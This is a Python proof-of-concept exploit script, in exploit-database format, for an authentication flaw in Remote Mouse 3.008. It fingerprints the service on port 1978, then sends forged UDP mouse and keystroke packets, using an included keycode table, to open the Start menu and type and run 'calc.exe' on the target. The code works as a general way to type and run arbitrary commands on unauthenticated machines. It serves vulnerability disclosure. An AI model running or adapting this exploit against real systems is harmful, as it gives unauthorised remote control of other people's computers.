1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136 | """
# Exploit Title: Remote Mouse 3.008 Failure to Authenticate
# Date: 4/9/2019
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
This script pops calc as proof of concept (albeit a bit slowly)
It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
"""
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos 5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos 5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos 5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos 6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
class mouse:
leftClick="mos 5R l"
rightClick="mos 5R r"
middleClick="mos 5R m"
characters={
"A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
"F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
"K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
"P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
"U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
"Z":"key 8[ras]111",
"a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
"f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
"k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
"p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
"u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 6[ras]13", "9":"key 6[ras]12", "x0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
"+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
"#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
"*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
'"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
"~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
",":"key 7[ras]25", ".":"key 7[ras]27"
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("calc.exe",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process calc.exe has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()
|
